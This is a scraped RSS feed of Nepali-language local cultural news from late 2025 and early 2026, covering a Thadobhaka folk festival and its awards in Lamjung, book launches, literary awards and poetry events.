ठाडोभाका मेलाका अवसरमा ठाडोभाकाको लोगो सहितको पिन (व्याच) को समेत विमोचन गर्ने निर्णय गरिएको समितिका कार्यकारी सदस्य देवराज गुरुङले बताउनु भयो । उहाँका अनुसार स्मारिका तथा लोगो प्रकाशनको जिम्मा अध्यक्ष नवराज पहाडीलाई दिइएको छ । स्मारिकामा प्रतिष्ठानको वर्तमान कार्यसमितिले बितेका तीन वर्षको अवधिमा गरे गराएका कामहरूको संक्षिप्त जानकारी समेटिने भएको छ । ठाडोभाका सातौं खुला प्रतियोगिता : साथमा बाघ चालको चौथो तथा पात बजाउने कलाको तेस्रो खुला प्रतियोगिता :
यो वर्षको ठाडोभाका मेला मस्र्याङदी गाउँपालिका– ८ को बडागाउँमा हुने भएको छ । स्थानीय आमा समूहको व्यवस्थापन सहयोगमा मेला सञ्चालन गर्ने भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भयो । उहाँका अनुसार प्रतिष्ठानको स्थापना दिजसका अवसरमा तीन दिवसीय ठाडोभाका मेला सञ्चालन गर्ने गरिन्छ । मेलामा ठाडोभाका मेलाका अवसरमा विगत वर्षझैं ठाडोभाका खुला प्रतियोगिता, बाघ चालको खुला प्रतियोगिता तथा पात बजाउने कलाको खुला प्रतियोगिता समेत सञ्चालन गरिने तय भएको छ ।
उक्त अवसरमा विमोचन गर्ने गरी स्मारिका प्रकाशन गर्ने समेत निर्णय भएको छ । उक्त स्मारिकामा ठाडोभाकाका गायक गायिकाको चिनारी, प्रतिष्ठानका वरिष्ठ आजीवन सदस्यहरूको जीवनी तथा सम्बद्ध व्यक्तित्वहरूले लेखेका सान्दर्भिक लेख कविता पनि स्मारिकामा प्रकाशन गरिने भएको छ ।
यसैगरी, ठाडोभाकाको लोगो सहितको पिन (व्याच)को समेत विमोचन गर्ने निर्णय गरिएको समितिका कार्यकारी सदस्य देवराज गुरुङले बताउनु भयो । उहाँका अनुसार स्मारिका प्रकाशनको जिम्मा अध्यक्ष नवराज पहाडीलाई दिइएको छ । स्मारिकामा वितेको कार्यकालको तीन वर्षको अवधिमा गरिएका कामको संक्षिप्त जानकारी हुनेछ । बडागाउँमा ठाडोभाका मेला :
ठाडोभाका लोककला प्रतिष्ठान नेपालले सञ्चालन गर्ने ठाडोभाका मेला यो वर्ष बडागाउँमा गरिने भएको छ । मर्स्याङदी गाउँपालिका– ८ को बडागाउँमा ठाडोभाका मेला सञ्चालन गर्नका लागि त्यहाँको शान्ति आमा समूहका अध्यक्ष कुशमाया गुरुङ र प्रतिष्ठानका अध्यक्ष पहाडीका बीचमा सहमति भएको छ । प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ सहितको टोली बडागाउँ आउने भनेपछि बडागाउँबासीहरू उत्साहित भएको समूहका अध्यक्ष कुशमाया गुरुङले बताउनु भएको छ । सर्वाधिक पुरस्कार वितरण गर्ने संस्था :
स्थापनाको दर्शौं वर्ष मनाइरहँदा ठाडोभाका लोककला प्रतिष्ठान नेपाल जिल्ला(लमजुङं)मा सर्वाधिक पुरस्कार (आठ वटा) वितरण गर्ने संस्थाका रुपमा दरिन सफल भएको छ । यो प्रतिष्ठानको अक्षयकोष रकम करिब २२ लाख रुपैयाँ पुगेको समेत अध्यक्ष पहाडीले जानकारी दिनुभयो । उहाँका अनुसार यो वर्षबाट ठाडोभाका देउवहादुर दुरा स्मृति पुरस्कार वितरण थालिने यो पुरस्कार प्रतिष्ठानको सबैभन्दा ठूलो धन राशि (३० हजार रुपैयाँ)को हुने भएको छ । यसअघि सर्बाधिक राशिको पुरस्कार ठाडोभाका– हने सुवे सन्तबहादुर गुरुङ स्मृति पुरस्कार रहेको थियो । २२ हजार २२२ रुपैयाँ नदर राशिको यो पुरस्कार ४५ वर्षभन्दा कम उमेरका ठाडोभाकाका अभियन्ताहरूलाई वितरण गर्ने गरिन्छ । यो पुरस्कार यसअघि दुई वर्ष वितरण भइसकेको छ ।
प्रतिष्ठानले वितरण गर्ने पुरानो पुरस्कार ठाडोभाका– टीकाकुमारी ढुंगाना स्मृति पुरस्कार हो । १० हजार पुरस्कार राशि रहेको यो पुरस्कार यसअघि छ पटक वितरण गरिसकिएको छ । यसैगरी, ठाडोभाका– दुर्गा स्मृति पुरस्कार यो वर्ष दोस्रोपटक वितरणको तयारी छ । लोक संस्कृतिका अभियन्ताहरूलाई वितरण गर्ने यो पुरस्कार राशि पाँच हजार रुपैयाँको अध्यक्ष पहाडीले जानकारी दिनुभयो । उहाँका अनुसार अर्का दुई पुरस्कार ठाडोभाका– रामदत्त अधिकारी स्मृति पुरस्कार र ठाडोभाका– जगतमाया स्मृति पुरस्कार रहेका छन् । यी पुरस्कार क्रमशः भजन, बालुन आदिको संरक्षणमा जुटिरहेका संस्थाहरूलाई प्रदान गरिन्छ भने अर्को लोकसंस्कृतिका अभियन्ता खासगरी ठाडोभाकाका अग्रज महिला गायिकालाई प्रदान गर्ने गरिन्छ । ती दुवै पुरस्कारको राशि ५÷५ हजार रुपैयाँ रहेको छ । यी सबै पुरस्कार ठाडोभाका मेलाको उदघाटनका अवसरमा वितरण गर्ने गरिन्छ ।
यसैगरी, अर्को ठाडोभाका– असल आमा बाबा सम्मान पुरस्कार तेस्रो पटक यो वर्ष वितरण गरिसकिएको छ । जसको पुरस्कार राशि १० हजार नगद रहेको छ । अर्को ठाडोभाका– सिर्जना थापा विरही प्रतीभा पुरस्कार रहेको छ । यो पुरस्कार प्रशिक्षणमा उत्कृष्ठ हुने सहभागीलाई प्रदान गर्ने गरिन्छ । गत वर्षदेखि यो पुरस्कार वितरण थालिएको अध्यक्ष पहाडीको भनाइ छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=381180‘जुद्धबहादुर श्रेष्ठ औद्योगिक क्षेत्रका अग्रणी’ र ‘पूर्ण बहादुर श्रेष्ठ ‘व्यथित’का गद्य रचनाहरू’ तथा ‘नशा नशामा’ गीत लोकार्पित
https://www.antaranganews.com/?p=38014
https://www.antaranganews.com/?p=38014#respondSun, 25 Jan 2026 05:52:16 +0000https://www.antaranganews.com/?p=38014काठमाडौं– ‘जुद्धबहादुर श्रेष्ठ औद्योगिक क्षेत्रका अग्रणी’ र ‘पूर्ण बहादुर श्रेष्ठ ‘व्यथित’का गद्य रचनाहरू’ तथा ‘नशा नशामा’ गीतको लोकार्पण भएको छ । साहित्यिक पत्रकार संघको आयोजनामा संघले हिजो भृकुटीमण्डपस्थित नेपाल पर्यटन बोर्डको सभाकक्षमा आयोजना गरेको कार्यक्रममा माघ १० गते सो कार्यक्रम भएको हो ।
दुबै कृतिहरू र गीतको कार्यक्रमका प्रमुख अतिथि नेपाल प्रज्ञा प्रतिष्ठानका पूर्वसदस्य सचिव वनस्पतिविद् डा. तीर्थबहादुर श्रेष्ठ लगायत मञ्चासिन व्यक्तित्वहरूबाट सामूहिक रूपमा लोकार्पण गरिएको हो ।
सो अवसरमा सर्जक नरेन्द्रबहादुर श्रेष्ठ र श्रीमती निरू श्रेष्ठलाई अभिनन्दन गरिएको थियो ।
कार्यक्रममा प्रमुख अतिथि नेपाल प्रज्ञा प्रतिष्ठानका पूर्व सदस्य सचिव वनस्पतिविद् डा. तीर्थबहादुर श्रेष्ठले आफ्ना बुबा र काकालाई कृति मार्फत् चिनाउन सकेकोमा प्रशंसा गर्दै लोकार्पित दुई कृतिमा एउटा विशुद्ध साहित्यिक भएको र अर्को ऐतिहासिक अभिलेख भएको बताउँदै जुद्धबहादुर श्रेष्ठ भनेपछि उद्योग र उद्योग भनेपछि जुद्धबहादुर श्रेष्ठ भनेर चिनिने बताउनु भयो ।
यसैगरी वरिष्ठ समालोचक प्रा.डा. दयाराम श्रेष्ठले ’पूर्णबहादुर श्रेष्ठ ’व्यथित’का गद्य रचनाहरू कृतिबारे आफ्नो मन्तव्य राख्दै नेपाली साहित्यमा पूर्णबहादुर श्रेष्ठ ’व्यथित’ नाम कतै उल्लेख नभएको प्रसङ्गमा नरेन्द्रबहादुर श्रेष्ठले आफ्नो बुबाद्वारा रचित रचनाहरू सङ्कलन गरी कृतिका रूपमा ल्याइदिएकोमा धन्यवाद दिनु भयो भयो । उहाँले बुबाको बिंडो थाम्न नरेन्द्रबहादुर श्रेष्ठ सफल रहेको समेत उल्लेख गर्नु भयो । नेपाली साहित्यका प्रख्यात व्यक्तित्व पूर्णबहादुर श्रेष्ठको उपनामबाट प्रेरित भएर पनि केदारमान व्यथितले आफ्नो उपनाम व्यथित राखेको हो कि ! जुन अनुसन्धानको विषय हुनसक्छ भनेर पनि बताउनु भयो ।
सो अवसरमा ‘जुद्धबहादुर श्रेष्ठ औद्योगिक क्षेत्रका अग्रणी’ कृतिबारे वरिष्ठ समालोचक प्रमोद प्रधानले समीक्षात्मक मन्तव्य राख्दै जुद्धबहादुर श्रेष्ठको व्यक्तित्व र क्रियाकलापका बारेमा लेखकका आफ्नै काका रहेका जुद्धबहादुर श्रेष्ठले सङ्गलन गरेका ऐतिहासिक दस्तावेज र अभिलेखलाई जोगाएर कृतिका रूपमा समाज समक्ष राख्न सफल भएको र आफ्नो बुबा पूर्णबहादुर श्रेष्ठ ‘व्यथित’को निधन भएको केही महिनामा जन्मिएका नरेन्द्रबहादुर श्रेष्ठले आफ्नो पिताका गद्य रचनाहरू सङ्गलन गरी प्रकाशन गरेर कृति मार्फत् बुबालाई चिनाउने काम गरेको बताउनु भयो ।
‘जुद्धबहादुर श्रेष्ठ औद्योगिक क्षेत्रका अग्रणी’ ग्रन्थ र ‘नशा नशामा’ गीतका लेखक नरेन्द्र बहादुर श्रेष्ठ हुनुहुन्छ । ‘नशा नशामा’ गीतमा स्वर÷संगीत चर्चित सङ्गीतकार नरहरि प्रेमीको रहेको छ ।
लेखक नरेन्द्रबहादुर श्रेष्ठले आफ्ना बुबा पूर्णबहादुर श्रेष्ठ र काका जुद्धबहादुर श्रेष्ठको स्मरण गर्दै बुबा नचिनेको बा का बारेमा लेखेको बताउँदै आमाको संस्कारले नरेन्द्रबहादुर श्रेष्ठ बन्न सकेकोमा गर्व लागेको बताउनु भयो । श्रेष्ठले जीवनका आरोह अवरोहका बारेमा चर्चा गर्दै २०६२ सालमा आमालाई पनि गुमाउनु परेको प्रसङ्ग उठाउँदै आमाको ऋण तिर्न आमाको प्रतिमा आफैँले बनाएको बताउनु भयो ।
वरिष्ठ समालोचक प्रा.डा. दयाराम श्रेष्ठले ‘पूर्ण बहादुर श्रेष्ठ ’व्यथित’का गद्य रचनाहरू’को समीक्षा गर्नु भयो भने अर्का वरिष्ठ समालोचक प्रमोद प्रधानले ‘जुद्धबहादुर श्रेष्ठ औद्योगिक क्षेत्रका अग्रणी’ ग्रन्थको समीक्षा गर्नु भयो । कार्यक्रममा चलचित्र विकास बोर्डका अध्यक्ष चर्चित कलाकार दिनेश डिसी, नेपाल स्रष्टा समाजका अध्यक्ष श्रीओम श्रेष्ठ रोदन, नेपाल उद्योग वाणिज्य महासंघका पूर्व अध्यक्ष कुशकुमार जोशीले नरेन्द्रबहादुर श्रेष्ठको व्यक्तित्वबारे प्रकाश पार्दै आआफ्नो शुभकामना मन्तव्य राख्नु भयो ।
संघका अध्यक्ष राधेश्याम लेकालीको सभापतित्वमा भएको कार्यक्रममा उहाँले स्वागत मन्तव्य राख्दै ५४ वर्षदेखि नेपाली भाषा, साहित्य, कला, संस्कृति र साहित्यिक पत्रकारिताको उन्नयन र प्रवद्र्धनमा अग्रणी भूमिका निर्वाह गर्दै आएको साहित्यिक पत्रकार संघको चर्चा गर्दै लोकार्पित दुबै कृतिका बारेमा बताउनु भयो ।
दिनेश डिसी, श्रीओम श्रेष्ठ रोदन तथा कुशकुमार जोशीले लेखक नरेन्द्रबहादुर श्रेष्ठको व्यक्तित्व र कृतित्व माथि संक्षेपमा प्रकाश पार्दै शुभकामना व्यक्त गर्दै मन्तव्य राख्नु भएको थियो ।
कवि मुरारी सिग्देलले सहजीकरण तथा सञ्चालन गर्नु भएको सो कार्यक्रममा सर्जक नरेन्द्रबहादुर श्रेष्ठद्वारा रचित ‘नशा नशामा’ गीतलाई चर्चित गायक नरहरि प्रेमीले गाउनु भएको थियो ।
कार्यक्रममा केही समयअघि मात्र दिवङ्गत हुनु भएका साहित्यिक पत्रकार संघका पूर्व अध्यक्ष, ‘उन्नयन’ साहित्यिक त्रैमासिक पत्रिकाका सम्पादक लेखक अच्युतरमण अधिकारीको स्मृतिमा एक मिनेट मौन धारण गरी श्रद्धाञ्जलि अर्पण गरिएको थियो ।
कार्यक्रमको अन्तमा लेखक नरेन्द्रबहादुर श्रेष्ठका सुपुत्र निश्चल श्रेष्ठले परिवारको तर्फबाट धन्यवाद ज्ञापन गर्नु भएको थियो ।
नरेन्द्रबहादुर श्रेष्ठकी नातिनी निश्चिता श्रेष्ठद्वारा मञ्चासिन व्यक्तित्वहरूलाई रुद्राक्षको माला लगाइदिएर स्वागतसम्मान गरिएको थियोे भने मञ्चासिन व्यक्तित्वहरूलाई साहित्यिक पत्रकार संघका तर्फबाट मायाको चिनो समेत प्रदान गरिएको थियोे ।
]]>https://www.antaranganews.com/?feed=rss2&p=380140स्रष्टाद्वय मीना चौलागाईं र पवन आलोक ‘जगदीश घिमिरे स्मृति पुरस्कार’बाट सम्मानित
https://www.antaranganews.com/?p=37952
https://www.antaranganews.com/?p=37952#respondTue, 20 Jan 2026 13:47:42 +0000https://www.antaranganews.com/?p=37952काठमाडौं– स्रष्टाद्वय पवन आलोक र मीना चौलागाईं सम्मानित हुनु भएको छ । जगदीश घिमिरे प्रतिष्ठानद्वारा उहाँहरूलाई सम्मान गरिएको हो । साहित्यकार जगदीश घिमिरेको एघारौं स्मृति दिवसको अवसरमा रामेछापको मन्थलीमा सम्पन्न साहित्यिक सभामा स्रष्टा आलोक र चौलागाईं माघ ३ गते सम्मानित हुनु भएको हो ।
उक्त कार्यक्रममा स्रष्टाद्वय मीना चौलागाईं र पवन आलोकलाई क्रमशः २०८१ र २०८२ सालको ‘जगदीश घिमिरे स्मृति पुरस्कार’ले सम्मानित गरिएको आयोजकको भनाइ छ ।
मन्थली नगरपालिकाकी उपमेयर ईश्वरी बस्नेतले स्रष्टाद्वयलाई क्रमशः ५१ हजार नगदराशिको चेक र ‘जगदीश घिमिरे प्रतिष्ठान’की अध्यक्ष एवम् जगदीश घिमिरेकी धर्मपत्नी श्रीमती दुर्गा घिमिरेले सम्मानपत्र अर्पण गर्नुभएको थियो । सो क्रममा प्रमुख अतिथि बस्नेतले नगरपालिकाले साहित्य, कला, संस्कृतिको खोज, संरक्षण र प्रवद्र्धनका क्षेत्रमा ध्यानाकर्षण भएको बताउनु भयो । उपमेयर बस्नेतले जगदीश घिमिरेको सम्मानमा सङ्ग्रहालय बताउने कार्यमा नगरपालिकाको धारणा सकारात्मक रहेको बताउँदै यसमा नगरपालिकाले विभिन्न निकायहरूसँग समन्वय गरेर अगाडि बढ्ने बताउनुभयो ।
साहित्यकार श्रीओम श्रेष्ठ रोदनले पुरस्कृत स्रष्टाद्वयको व्यक्तित्व परिचय दिनुभएको थियो । उक्त कार्यक्रममा जगदीश घिमिरे प्रतिष्ठानका सल्लाहकारहरू क्रमशः नगेन्द्रराज शर्मा, रोचक घिमिरे र ज्ञानु पाण्डेले पनि मन्तव्य राख्नुभएको थियो ।
डा.सुमन कर्माचार्यको उद्घोषणमा सञ्चालित उक्त समारोहमा उहाँद्वारा लिखित ‘जगदीश घिमिरेको संक्षिप्त जीवनी’ पनि लोकार्पण गरिएको थियो ।
कार्यक्रममा शुभकामना मन्तव्य राख्ने क्रममा केही वक्ताहरूले हाल सरकारी स्वामित्वमा रहेका साहित्यकार जगदीश घिमिरे जन्मनु भएको मन्थलीस्थित घरलाई जगदीश घिमिरेको सम्मानमा सङ्ग्रहालयको रूपमा विकसित गरिनुपर्ने धारणा राखेका थिए ।
तामाकोशी सेवा समिति, मन्थलीका अध्यक्ष गुञ्जबहादुर श्रेष्ठले स्वागत मन्तव्य राख्दै शुरू भएको उक्त कार्यक्रममा साहित्यकार माधव शयपत्रीले जगदीश घिमिरेको व्यक्तित्वमाथि प्रकाश पार्नु भएको थियो । उहाँले समाजमा पछि पारिएका भुइँमान्छेहरूको पक्षमा सशक्त रूपमा कलम चलाउने घिमिरेको यसरी स्मृति दिवस मनाउनु सकारात्मक भएको बताउँदै रामेछापमा जन्म लिएर राष्ट्रियस्तरमा योगदान पु¥याएका अन्य विभिन्न दिवंगत स्रष्टाहरूलाई पनि रामेछाप जिल्लाले यसैगरी स्मरण गरेर सम्मान गर्नुपर्ने धारणा राख्नुभएको थियो ।
उक्त समारोहमा ज्ञानु पाण्डे, हिरालाल आचार्य (अनार बाजे), गङ्गा चापागाईं, गौरव बोहोरा, डा.उमेश घिमिरे, बद्री नयाँघरे, देविकानन्द तिमल्सिना, मधु पाठक, प्रेम घिमिरे, राजेश उपाध्याय, सुषमा आचार्य अंशु, कुमार दाहाल, वसन्त रिजाल, नगेन्द्रराज शर्मा, रोचक घिमिरे, प्रतीक घिमिरे, डा. सुमन कर्माचार्य लगायतका कविहरूले आआफ्ना रचना वाचन गर्नु भएको थियो ।
उक्त अवसरमा ‘साहित्यिक र सामाजिक योगदानमा जगदीश घिमिरेको उपस्थिति’ शीर्षक वक्तृत्व प्रतियोगिता गर्नुका साथै विजयी विद्यार्थीहरूलाई पुरस्कृत गर्ने कार्य गरिएको थियो ।
अन्तरमनको कथाका लेखक जगदीश घिमिरे २०६४ सालको मदन पुरस्कार विजेत हुनुहुन्थ्यो । २००२ चैत २८ गते रामेछापको मन्थलीमा जन्मनु भएका उहाँ ‘माइलोमा’ नामक रक्त क्यान्सरका कारण ६८ वर्षको उमेरमा २०६७ कार्तिक १४ गते निधन भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=379520प्रलेस, गण्डकीद्वारा प्रगतिशील कविगोष्ठी सम्पन्न
https://www.antaranganews.com/?p=37688
https://www.antaranganews.com/?p=37688#respondSat, 03 Jan 2026 13:31:48 +0000https://www.antaranganews.com/?p=37688पोखरा, पुस १९ गते । प्रगतिशील लेखक सङ्घ, गण्डकी प्रदेशले शनिवार पोखरामा गण्डकी प्रदेशस्तरीय कविगोष्ठी सम्पन्न गरेको छ ।
प्रलेस, गण्डकीका अध्यक्ष प्रा. डा. यदुनन्दन उपाध्यायको अध्यक्षतामा भएको कार्यक्रममा गण्डकी प्रदेशका ८ जिल्लाका ८ कविहरूले प्रगतिशील कविता प्रस्तुत गरेका थिए । लमजुङका वासुदेव थापा, तनहुँका युवराज पौडेल, गोरखाका रामप्रसाद खनाल, स्याङ्जाका अनन्त अर्याल, म्याग्दीका प्रकाश अधिकारी, बागलुङका लाल ऋतम्भरा, पर्वतका राजकुमार निरञ्जन र कास्कीकी गीता तिवारीले कविता प्रस्तुत गरेका थिए । वाचित कविताको समीक्षा गर्दै साहित्यकार नारायण मरासिनीले गण्डकी प्रदेशमा प्रगतिशील कविताको भविष्य बलियो बन्दै गएको बताए । वाचित कविताले उठाएका विचारले नेपाली समाजको प्रतिनिधित्व मात्र नभई वर्तमानमा देखिएको परिवर्तनको आकाङ्क्षालाई पनि मुखरित गरेको भन्दै प्रगतिशील कविताको स्कुलिङलाई थप सुदृढ बनाउनुपर्ने आवश्यकता औँल्याए ।
कार्यक्रममा प्रलेस, गण्डकीका सल्लाहकार रघुनाथ अधिकारीले कविताले मानवीय जीवनलाई छुनुपर्नेमा जोड दिए । प्रगतिशील कविताले यथास्थितिका विरुद्ध बुलन्द आवाज उठाउनुपर्ने भन्दै अधिकारीले गण्डकी प्रदेशका नवपुस्तका कविहरूको स्वर आशालाग्दो देखिएको धारणा राखे ।
प्रगतिशील लेखक सङ्घका केन्द्रीय सदस्य भीम रानाभाटले साहित्य स्वान्त सुखायका लागि मात्र नभई समाजप्रति उत्तरदायी हुनुपर्नेमा जोड दिए । उनले आफूले के लेख्दै छु, किन र कसका लागि लेख्दै छु भन्ने कुरामा सचेत भएर लेखनमा लाग्नुपर्ने भनाइ राखे ।
गायिका तथा साहित्यकार हरिदेवी कोइरालाले गण्डकी प्रदेशका प्रगतिशील कविता एकसाथ सुन्न पाउँदा खुसी लागेको अनुभव सुनाइन् ।
सचिव रुपिन्द्र प्रभावीको सञ्चालनमा भएको कार्यक्रममा उपाध्यक्ष निर्मल सापकोटाले स्वागत गरेका थिए ।
]]>
https://www.antaranganews.com/?feed=rss2&p=376880जटेश्वर आधारभूत विद्यालयद्वारा दुई अग्रज साहित्यकारलाई सम्मान
https://www.antaranganews.com/?p=37581
https://www.antaranganews.com/?p=37581#respondWed, 31 Dec 2025 02:27:06 +0000https://www.antaranganews.com/?p=37581ठूलीबेसी(लमजुङ)– लमजुङको मर्स्याङदी गाउँपालिका– ६ को यहाँ स्थित जटेश्वर आधारभूत विद्यालयद्वारा दुई अग्रज साहित्यकारलाई सम्मान गरेको छ । विद्यालयको ७० औं वार्षिकोत्सव तथा अभिभावक दिवसको तीन दिवसीय कार्यक्रमको समापनका अवसरमा साहित्यकार तथा कविहरूलाई सो सम्मान पुस १३ गते प्रदान गरिएको हो ।
सम्मानित हुनुहुने व्यक्तित्वमा रामचन्द्र न्यौपाने नववासी (सन्त कवि) तथा आशबहादुर गुरुङ हुनुहुन्छ । उहाँहरूका करिब पौने दर्जन कृतिहरू प्रकाशित छन् । कवि द्वय पुरानो १४ खोला तथा हालको बाघेता क्षेत्रकै अग्रज कवि व्यक्तित्वका रुपमा परिचित हुनुहुन्छ ।
उहाँहरूलाई सो कार्यक्रमका प्रमुख अतिथि ङ्यादी हाइड्रो पावर कम्पनी लि. सरोकार समितिका अध्यक्ष लोकनाथ घिमिरे, सभाका अध्यक्ष इमानसिंह अधिकारी, विद्यालयका प्रधानाध्यापक थम्बसिंह थापाले टिका, माला, दोसल्ला र सम्मान पत्रले सम्मान गर्नु भएको हो ।
उक्त अवसरमा महिला अभिभावकका लागि हाजिरीजवाफ र पुरुष अभिभावकका बीचमा भलिबल प्रतियोगिता गरिएको थियो । हाजिरीजवाफतर्फ ३ टिमले भाग लिएकोमा तल्लोथोक टोल पहिलो भयो भने टारी टोल दोस्रो भयो । त्यस्तै भलिवलतर्फ पनि तल्लोथोक टोल पहिलो भएको थियो भने दोस्रो हुनेमा ङ्यादी हाईड्रोको टोली रह्यो । सो प्रतियोगितामा छ टिमले भाग लिएको सो विद्यालयका शिक्षक बेलबहादुर थापाले बताउनु भयो ।
उहाँका अनुसार उक्त अवसरमा तीन दिनसम्म विद्यार्थीहरूका लागि अन्तर सदनात्मक खेल खेलाइएको थियो भने ती खेलमा विजयी हुनेहरूलाई पनि पुरस्कृत गरिएको थियो ।
कार्यक्रममा सो विद्यालयका प्रधानाध्यापक थम्बसिंह थापाले करिव ५० लाख बराबरको अम्दानी खर्चका साथ विद्यालयको प्रगति विवरण प्रस्तुत गर्नु भएको थियो ।
सांस्कृतिक प्रस्तुतिका साथ कार्यक्रमलाई मनोरञ्जनात्मक बनाइएको सो अवसरमा प्रमुख अतिथि घिमिरे, सोही वडाका अध्यक्ष मीनाराशी गुरुङ, सम्मानित कवि व्यक्तित्वद्वय सन्त कवि तथा गुरुङ, विद्यालय व्यवस्थापन समितिका पूर्वअध्यक्ष नरबहादुर अधिकारी, जीतबहादुर भण्डारी, टारी टोल सुधार समितिका अध्यक्ष शारदा पाण्डे, माझटोल महिला समूहका अध्यक्ष सम्झना थापालगायतले आआफ्नो धारणा सहित शुभकामना मन्तव्य व्यक्त गर्नु भएको थियो ।
विद्यालय व्यवस्थापन समितिका अध्यक्ष इमानसिंह अधिकारीको अध्यक्षतामा भएको उक्त कार्यक्रममा शिक्षक बेलबहादुर थापाले स्वागत मन्तव्य राख्नु भएको थियो भने सञ्चालन शिक्षक रामप्रसाद परियारले गर्नु भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=375810गौरी तमूको ‘सैँप्रोल’ बजारमा
https://www.antaranganews.com/?p=37351
https://www.antaranganews.com/?p=37351#respondSat, 20 Dec 2025 15:53:44 +0000https://www.antaranganews.com/?p=37351पोखरा, पुस ५ गते । कवि गौरी तमूको दोस्रो कृति ‘सैँप्रोल’ शनिवार पोखरामा सार्वजनिक गरिएको छ ।
गुरुङ साहित्यिक मञ्चद्वारा आयोजित कार्यक्रममा नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका पूर्वकुलपति सरुभक्तले कृति सार्वजनिक गरे । विशेष गरी तमू जातिभित्रका संस्कार र संस्कृतिलाई नेपाली भाषाको साहित्यिक भण्डारमा प्रवेश गराउनका लागि गौरीको भूमिका उल्लेखनीय रहेको भन्दै सरुभक्तले नेपालका आदिवासी जनजातिका जातीय विम्बहरूलाई आम पाठकमाझ पुर्याउनुपर्नेमा जोड दिए । उनले किनारीकृत वर्गको अधिकार र उत्थानका लागि सङ्घर्षरत स्रष्टाका रूपमा आफूले गौरीलाई चिनेको स्मरण गरे । गौरीको प्राज्ञिक कर्मबाट मातृभाषी स्रष्टाहरूले प्रेरणा लिन सक्ने हो भने सिङ्गो नेपाली साहित्य नै लाभान्वित हुने सरुभक्तको विचार थियो । सैँप्रोलले उठाएका विचारले नेपाली समाजलाई असल मार्गदर्शन गर्नेमा उनले विश्वास व्यक्त गरे ।
कृतिकार गौरीले आफूले ‘म को हुँ’ भन्ने प्रश्नको जबाफ खोज्दाखोज्दै कवितासँग नजिकिएको अनुभव सुनाइन् । तमू जातिका सांस्कृतिक र धार्मिक ग्रन्थहरूमा प्रशस्त मिथकहरू पाइने उल्लेख गर्दै केही मिथकलाई सैँप्रोलमा उठाउने प्रयास गरेको गौरीले बताइन् । महिला अस्तित्वसँगै गुरुङ जातिको उत्पत्ति र विकासका प्रक्रियाहरूलाई कविताका रूपमा प्रस्तुत गरेको बताउँदै आदिवासी जनजातिको संस्कृति र भूगोलमाथि सत्ताले गरेको आक्रमणविरुद्धको आक्रोश सैँप्रोलमा प्रस्तुत गरेको गौरीले बताइन् । आदिवासी जनजातिको नैसर्गिकताका विरुद्ध कानुन निर्माण गरी उनीहरूको जीवनदर्शनलाई अपदस्थ गर्ने राज्यसत्तामाथि कृतिमा प्रश्न उठाउने प्रयास आफूले गरेको उनको भनाइ थियो । गुरुङ साहित्यक मञ्चकी संस्थापक अध्यक्ष तथा र्यान्डम रिडर्स सोसाइटीकी उपाध्यक्षसमेत रहेकी तमूको यसअघि ‘समैँ दर्बानी’ नामक मुक्तक सङ्ग्रह प्रकाशित छ ।
कृतिको समीक्षा गर्दै साहित्यकार गनेस पौडेलले पहिचानवादी साहित्यलेखनको एक मानक कृतिका रूपमा सैँप्रोल आएको धारणा राखे । धेरै ‘पन्चलाइन’ हरू भएको कृतिमा भएका कविताहरूलाई उनले ‘मन्त्रकविता’ को संज्ञा दिए । गुरुङ समुदायको सौन्दर्यचेतको सरल तर गहन प्रस्तुति रहेकाले कृति उत्कृष्ट बनेको भन्दै पौडेलले वैचारिकी दृष्टिले पनि कृतिलाई अब्बल मान्न सकिने भनाइ राखे ।
अर्का समीक्षक साहित्यकार तीर्थ गुरुङले गौरीको सिर्जनशील सक्रियता लोभलाग्दो रहेको भन्दै यो कृतिले नेपाली कविताका क्षेत्रमा विशेष महत्त्व राख्ने बताए । संस्थागत सक्रियता, प्राज्ञिक कर्म र सिर्जनशील कार्यलाई एकसाथ अगि बढाउन सफल गौरीबाट आम गुरुङ समुदायले विशेष शिक्षा लिनुपर्नेमा गुरुङको जोड थियो ।
सो अवसरमा कृतिभित्रका कविता रुपिन्द्र प्रभावी र सङ्गीता आभासले वाचन गरेका थिए । मञ्चका अध्यक्ष तेजबहादुर गुरुङको अध्यक्षता र कोषाध्यक्ष जसु गुरुङको स्वागतमा भएको कार्यक्रमको सञ्चालन रोशनी गुरुङले गरेकी थिइन् ।